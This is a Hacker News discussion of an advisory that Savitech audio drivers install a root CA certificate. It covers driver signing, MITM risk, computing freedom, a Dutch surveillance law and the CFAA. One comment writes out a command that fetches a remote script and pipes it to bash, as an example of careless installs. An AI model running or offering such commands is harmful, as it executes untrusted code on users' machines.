
Savitech USB audio drivers install a new root CA certificate - finnn
https://www.kb.cert.org/vuls/id/446847
======
ryan-c
The "Universal ADB Driver" for Android devices[1] also installs a root CA,
however it instead generates the CA during install, signs the driver, deletes
the private key, then installs the CA and driver.

1\.
[https://github.com/koush/UniversalAdbDriver](https://github.com/koush/UniversalAdbDriver)

~~~
hamandcheese
What good is a root CA with no key?

~~~
xgbi
It is actually clever:

\- generate a fake CA and use it to sign your driver on the fly;

\- add the generated root CA to the trusted list

\- delete the private key so that nobody else can sign anything with this CA

\- now windows will happily consider this driver as worthy of trust and
install it.

~~~
TylerE
That sounds very un-clever (edit: I mean by Microsoft). Why couldn't malware
do the exact same thing?

~~~
tialaramex
It absolutely could. The alternative is that Microsoft has complete control
over what software can run on any Windows PC. It turns out that people who
want this ("Man. I wish I could only run programs chosen by the monopoly
supplier") already have an iPad so this basically just creates a backlash.

I know what you're thinking "Oh, well there could be an exception for when you
need it, you'd just use admin to authorize it or something" and that's exactly
what this is.

~~~
fencepost
> The alternative is that Microsoft has complete control over what software
> can run on any Windows PC.

That would be the relatively little known (and new) Windows 10 S, where only
apps from the Windows Store can be installed or run. Designed for security (?)
and to compete with Chromebooks.

See also Windows RT

~~~
m-p-3
I can see some scenarios where this would be desirable. Like my grandparents,
who basically just wants to browse Facebook, etc.

Since they have a Chromebox, I do not have any calls regarding viruses or
their computer being slow, etc.

~~~
Spivak
But the desirability is proportional to the level of moderation of the store
and Microsoft's is complete shit: it's full of not-quite-malware and not-
quite-scams.

------
userbinator
I am not saddened by this event, but by the fact that such occurrences will
only add momentum to the movement to lock down computing devices and take
freedom away from their users:

[https://news.ycombinator.com/item?id=12061320](https://news.ycombinator.com/item?id=12061320)

Those worrying about security should remember that device drivers already run
in ring 0 and can do anything they damn well please.

Thus I say: Good on Savitech for not being afraid to rebel against; and
fuckings to the corporatocracy that is certificate authorities and the
authoritarian security industry.

~~~
TeMPOraL
I do not know what to do anymore.

I am with you here, as I've been for many years (you link to a comment of
yours that links to a comment of mine, for that effect). I'm even fond of
saying, "security vs. fun - pick one". But I start to increasingly understand
the arguments from the other side.

Consider: what I consider an essential "fun" of computing is being able to
alter software running on my machine as I see fit. If I want to make it so
that Windows Notepad is pink, or supports Emacs shortcuts, I should be able to
mess with both binary on my hard drive _and_ running process in memory,
because it's my computer and my rules. But the same mechanisms allow an evil
person to make _my mother 's_ Notepad look like her e-mail account login
screen and exfiltrate data from that. I dream of having an OS as malleable and
tightly integrated as Lisp Machines were, but I wouldn't dare connect it to
the Internet these days.

So what can one do? How to approach it? Is there even a way to create a
computer that both respects the end-user as its rightful owner and can be
safely used to conduct business and pleasure on-line? I honestly don't know if
this is even possible in principle. If it is, I would appreciate being pointed
towards possible solutions, because this - I believe - is a case worth
fighting for.

~~~
jsmthrowaway
The problem is that “end-user” means two very different things. Most hackers
still think of “end-user” as you and me (note the answers you’re getting), and
this is why Free Software is losing battles left and right, particularly in
mobile. Stallman’s comments re: iPhone, for example, demonstrate that as an
industry and advocacy group we still don’t _really_ understand this.

We have to accept that those who _need_ rigid, inflexible computing to protect
them far outnumber us. People don’t care if they can rewrite Notepad or read
its source code, they care that Facebook works and that they don’t get viruses
or added to a botnet. The _only_ way to develop a healthy advocacy here is to
understand that the hacker ideals and customizability that we expect of a
computing system really make us a vanishing minority and acknowledging that
for the now-average user, those ideals make less and less sense as time goes
on. We had our run, then everybody else found computers. Times change. It’s
not bad.

Is there a way to create your computer? For us, probably. For them, I’m
increasingly believing it isn’t. This isn’t a knock against anyone, just an
acknowledgment that there are almost certainly two answers to this question
and Free Software ideals and beliefs aren’t equipped to handle the much, much
larger answer. Proprietary operating systems, walled gardens, Internet
centralization, it plays toward all of the ideals Free Software has been
holding dear for decades. We have to evolve our thinking, I’m afraid. The less
we acknowledge that perhaps Free Software is wrong for the average user, the
less we will have a voice at the table; eventually, nobody will listen at all.

Hell, many cars don’t even allow you to work on them any more. Look at Teslas,
higher-end Audis, etc. I offered to change my neighbor’s oil in his Audi and
he got scared about his warranty.

~~~
TeMPOraL
Heh.

It's good you brought up cars, as they're a perfect example of conflicting
needs. Cars are now computers on wheels, and while I'd love to drive a car I
personally modded at firmware level, I would also be against allowing such
cars on public roads. One, hackers make mistakes, and two, malicious actors
would trick regular people into modding their cars to further their malicious
goals. Both reasons create public hazard. Which is obvious in case of cars,
but less obvious with computers connected to the Internet.

At this point I fear we might need to fork computing entirely - let the
regular users live in "hell" of propertiary, locked down _services_ they don't
actually own, while ourselves, we get the "heaven" of free software... that's
pretty much not allowed to interact with regular users. I don't see how to
keep the two worlds as one, because all features meant for hackers can also be
used by malicious actors to pwn people.

Consider e.g. dev console in a web browser. All is cool, because regular users
don't know what F12 does and wouldn't even think of pressing it. But then
Facebook and others have to put Self-XSS measures into place, because a
malicious actor can _tell_ a regular user what F12 does, and how it "can" let
them see who viewed their Facebook profile...

I hate the idea of split world. It means I won't be able to e.g. automate my
banking or pizza delivery, because those things will have to go through "dumb"
computing, to avoid self-pwnage risks. It means that eventually I won't be
able to even get a general-purpose computer, because the nature of niche
markets is that they generally _don 't_ get served with good stuff at
accessible prices - they either get served at exorbitant prices, or don't get
served at all.

So I don't want that split world. I want an alternative to fight for. But as I
previously wrote, I can't see any.

~~~
digi_owl
I am of two minds of such a split world, as all too often it means that when a
geek is called on to fix something for the rest of us, they invariably can't
because they can't get the right access.

Never mind that i fear that the black hats of the world will always find a way
to break the sandbox of the "safe" computers, and thus we are effectively
fucked. Because now they have access on a level the rest of us do not, and
thus can't counter their actions.

BTW, i do believe Cory Doctorow has done a couple of speaking tours on this
under the titles "The coming war on general purpose computing" and "The coming
civil war on general purpose computing".

The first being about government demands for a computer that do everything but
some naughty action, and the second about well meaning geeks locking down
computers to make them "safer".

------
Osiris
Why does Windows allow programs to install root CA certs without separate user
intervention (beyond the initial "grant admin permissions" dialog)?

~~~
throwaway130917
Maybe it's time for desktop operating systems to adopt permissions systems
like smartphones. Permission for network access, permission for non-current
user files and registry, permission to install certs.

~~~
wvenable
The problem is how do you educate users on these prompts.

On smartphones permissions are pretty obvious (Camera, Contacts, Location,
Pictures) but even they sometimes have consequences beyond the obvious.

How would would one even begin to word a certificate store permission so that
the average person would understand the consequences of it?

~~~
tonmoy
I consider myself tech savvy (by no means do I understand that much more than
an average user). When I tried to enable my company’s mail on my personal
iPhone, I was prompted to install a certificate. In my haste I thought it was
just a certificate for *.my-company.com domains, but iPhone showed me a
message in the likes of “the owner of the certificate would be able to
read/modify all my network communication, monitor/install/uninstall all apps I
have... “ and so on. That was enough to stop me in my tracks and now I’m
waiting for a company phone instead.

~~~
fencepost
That's pretty common, and is one of the reasons for some of the third party
exchange clients on Android devices. At least one of the early ones (Nitro?)
maintained its own separate data store for email and possibly other things so
that when policies were used to wipe data it could wipe only the data in that
app instead of the entire device.

The counter to that is that now I believe there are a bunch of Exchange
clients on Android that will simply ignore server policy or where handling of
policy can be controlled in the settings, which kind of defeats the point.

The original point of all those policies was to be able to erase supposedly
secure content if the device was lost or if someone left the company for
whatever reason.

Edit: the Exchange client I was thinking of is TouchDown, now owned (and
EOLed) by Symantec but I believe originally from NitroDesk.

------
walrus01
I would honestly be more worried about the root CAs which are enabled by
default in the most popular OSes and browsers, with root CA privileges for
government of China controlled entities, Turkish government entities and
unethical/shoddy root CAs such as Symantec. The Netherlands recently passed a
law allowing the government specifically to use false keys and run MITM on
crypto, which brings into question all .NL based CAs.

~~~
rvanmil
Do you have a reference to this law in The Netherlands?

~~~
rocqua
There is an upcomming advisory (i.e. non-binding) referendum about this law
coming up. Specifically, the referendum is about reversing the law.

Notably, some parties in the newly minted government have declared their
intention to ignore the referendum. They back this by two arguments "It is
needed for security" and "We are going to remove the advisory referendum
anyway, so we get to ignore this one".

That second point is kind of interesting, because the referendum is possible
due to a rather new law. We had one before that went rather poorly, so now we
want to get rid of it.

The actual law is here [1] this site [2] advocates for the referendum. I'm
afraid I don't know of any english sources.

Quoting from the law, and applying my own translation

>>

Article 45. Member 1

The services are authorized to:

a. (Basically, do exploratory searches of networks)

b. Use false signals, false keys, false identity or intervention by third
parties to gain acces to automated systems. This can be done with the help of
technical tooling.

Article 45. Member 2 The authorization from member 1b above also authorizes:

a. The defeating of any security measures

b. Installing technical measures to reverse encryption on data stored or
processed by automated systems. c. (references article 40)

d. To copy data stored or processed by an automated system.

Article 45 Member 2 (summarized, the government needs to give written
permission for any of the above to happen)

>>

This seems to be the referenced passage based on a preliminary search.

[1]
[https://zoek.officielebekendmakingen.nl/kst-34588-A.html](https://zoek.officielebekendmakingen.nl/kst-34588-A.html)

[2][https://sleepwet.nl/](https://sleepwet.nl/)

~~~
rvanmil
Thanks, I did not realize the “sleepwet” also authorized defeating encryption.

------
brian-armstrong
So this is a CFAA violation, right? When will we finally hold someone
accountable for blatant security issues like this?

~~~
somebodynew
In this specific case (installing a root certificate) I would say it's not
actually a CFAA violation because they're not "obtaining information",
"defrauding", or "intentionally causing damage". You might be able to argue
that installing the driver on a "government computer" produces a violation of
18 USC 1030 (a) (3), but the rules for a mere "protected computer" which
covers most internet-connected personal computers are actually not strict
enough to cover this.

[https://www.law.cornell.edu/uscode/text/18/1030](https://www.law.cornell.edu/uscode/text/18/1030)

~~~
nkw
"Whoever [...] knowingly causes the transmission of a program, information,
code, or command, and as a result of such conduct, intentionally causes damage
without authorization, to a protected computer [...] shall be punished as
provided in subsection (c) of this section."

"[T]he term 'protected computer' means a computer [...] which is used in or
affecting interstate or foreign commerce or communication, including a
computer located outside the United States that is used in a manner that
affects interstate or foreign commerce or communication of the United States"

"[T]he term 'damage' means any impairment to the integrity or availability of
data, a program, a system, or information"

~~~
justinjlynn
Law is a different language. While it may read like computer code; it isn't.
Well, it is but it's as if "goto" and ";" had different meanings depending not
only on the last keyword used, but also on the mood of the computer. I wish a
straightforward reading was possible but it's often not.

~~~
nkw
Some parts of the law are easier to appreciate if one considers vagueness and
ambiguity can be features instead of bugs.

~~~
rocqua
Those exact ambiguous laws are the ones that are abused most easily. There is
a hard balance between being general enough to cover bad things, without being
so general as to allow authorities to prosecute anyone on some charge.

------
joosters
It seems unacceptable to me that the updated drivers do not automatically
uninstall the CA. How is an ordinary user meant to navigate the certificate
store and delete the CA?

------
edejong
Phrased differently: operating system Microsoft Windows allows silent
installation of Root Certificate during installation of unrelated USB driver
installation, despite featuring a micro-kernel design.

------
elbigbad
Can someone explain root certificates to me and why this is an issue? I know
they sign certificates with a private key at a high level, but don't get the
implications of that generally.

~~~
arkadiyt
Anyone who installed this audio driver could have all their https traffic
intercepted by Savitech.

~~~
elbigbad
Does this mean savitech needs to hypothetically set up some mitm attack
somewhere and wait for you to send traffic, then they can decrypt and read, or
does it mean that they can do that direct from your computer by virtue of that
root certificate?

~~~
xythobuz
They would need to MITM you somewhere, but that could probably happen in their
audio driver that's already installed and running on the target machine.

------
grandalf
Is there software that will check the certs on my computers to make sure no
software has done this?

~~~
revelation
Well you can look at the certificate store by running certmgr.msc, but it's a
dangerous game - do you trust Go Daddy, COMODO or Symantec any more than you
do Savitech? They have all at one point or another given reason to not even
entrust them with organising a piss-up in a brewery.

Other applications like Firefox have their own independent root CA store.

~~~
tialaramex
Mmm. I think the brewery test is an unfair comparison. Our problem is not that
the major CAs are hopeless. If they were hopeless we'd have abandoned PKIX
years ago. Instead the problem is that they're good but not as good as we'd
like.

We are looking for somebody who can run aforesaid event fifty times a year for
the general public without anybody falling in any of the machinery. In
hindsight drunk people in an industrial workplace was a mistake, and so we can
and should demand they do their best to make it safe, but perfection just
isn't to be expected.

------
drzaiusapelord
>Microsoft provides guidance on deleting and managing certificates in the
Windows certificate store

Microsoft should mark these as malicious and quarantine them using their
built-in AV. If the end user needs them he can remove them from quarantine.
Posting advisories no end user will ever see isn't helping much.

------
revelation
The only version of Windows XP that enforces driver signing is the unicorn 64
bit one, surely they didn't develop the driver for that?

And what kind of odds do I get on the certs having a EKU for anything but
driver signing?

------
ArchReaper
Why are they allowed to bundle malware in their drivers? Why is this not
illegal?

~~~
kevindqc
A CA certificate by itself is not malware? Am I missing something?

~~~
steeleduncan
malware is certainly a strong term, and generally the definition seems to
include computer code, which would exclude installing a certificate.

However, once you have installed your own root CA certificate on a computer
means you can read all HTTPS traffic originating from that computer, and fake
responses. Likely, thanks to having installed that certificate you can read
someone's emails, move money out their bank account, and view any files they
have stored online.

The effect of installing a certificate is broadly similar to the effect of
installing a keylogger, and in neither case have you been given a right to do
so. In both cases you have altered someone's computer in such a way that you
are able to read their encrypted communications, which is certainly in the
spirit of what malware means to me.

I'm sure that the intent in this case was not malicious, but we would not
accept software installing a keylogger because they wish to measure your
typing speed, and we should not accept this.

~~~
ArchReaper
>I'm sure that the intent in this case was not malicious

What other explanation is there? Is there a valid reason for an audio driver
to silently install a CA cert?

~~~
tialaramex
As described above, some versions of Windows require drivers to be signed
proving who made them. For this to work Windows needs a list of CAs trusted to
issue the certificates. Whether "I am not paying somebody £100 for a cert"
constitutes a valid reason is arguable. But that seems to have been their plan
here.

------
xstartup
Alright, so if we get tons of install of our root CA cert. Can we start a new
CA?

~~~
toast0
Yes, but CAs can charge money based on (more or less) number of CA root cert
installations on the target devices for a company.

Some of your competitors have had their current root certs in device
preinstalled for a lot longer than you. Entrust and GlobalSign have 2048 bit
roots with Not Before before 2000.

If I'm going to go with a Johnny come lately root, I may as well use
LetsEncrypt because it doesn't cost money. Also, audio drivers may get you
desktop share, but getting into the platform store on mobile is a lot harder.

~~~
tialaramex
The major trust stores partition their trust of a root by purpose. So
Microsoft's trust of a particular root for signing certs that are used in
driver code signing is separate from not only Apple's trust of same but also
Microsoft's trust of that root for signing TLS certificates. Let's Encrypt
doesn't ask for any "trust bits" besides the Web PKI, ie TLS certificates and
that's completely deliberate.

Purposes other than TLS server and /maybe/ S/MIME are not subject to any
meaningful public oversight, you are entirely trusting Microsoft. Which for
drivers, or Xbox games is probably fine but it's worth keeping in the back of
your mind.

------
pfarnsworth
Is there a list of trusted CA certs that we could use to scan to see if we
have any that may not be trusted?

~~~
herf
You can use sigcheck -tv (sysinternals) to test against Microsoft's list.

I prefer RCC (root certificate checker) and have used it in the past, but the
website seems to be suspended.

------
obituary_latte
Curious as to why EMC got notified 20 days before anyone else...

------
arca_vorago
One more reason to add to the innumerable list of why not to use windows.

~~~
djsumdog
A bad actor could just as easily post a script as "Show HN" with some cool
stuff in it that you install via:

    
    
        curl https://example.com/some_script.sh | bash
    

A lot of people don't check those. Use the non-OSS nvidia or ATI drivers? You
have binary blobs (don't for ATI btw, the OSS ones are 10x better). Use
bluetooh/Wi-Fi on Linux, congratulations you are using closed binary blobs.

I still love Linux, but I don't hate windows. We're not in the 90s. Bill Gates
isn't master of the Borg.

~~~
arca_vorago
I think you underestimate the insidiousness of such systems, and your response
is completely logically fallacious, and doesn't support your conclusion
whatsoever. So if I installed a random script via curl (I prefer wget) and
because there are still some proprietary hardware that needs closed source
binary blobs... That suddenly means GNU/Linux and windows are on the same
footing? No, not at all, and I'm tired of hearing that trite and clichéd
response. The four freedoms matter.

No, its not the 90s. Now its worse!

------
fiatjaf
This, and all other thousands of cases of malware in the universe should mean
something for those who defend "native" apps over webapps.

~~~
dawnbreez
Including the various browser-based javascript malwares?

~~~
fiatjaf
I want to know more about that.

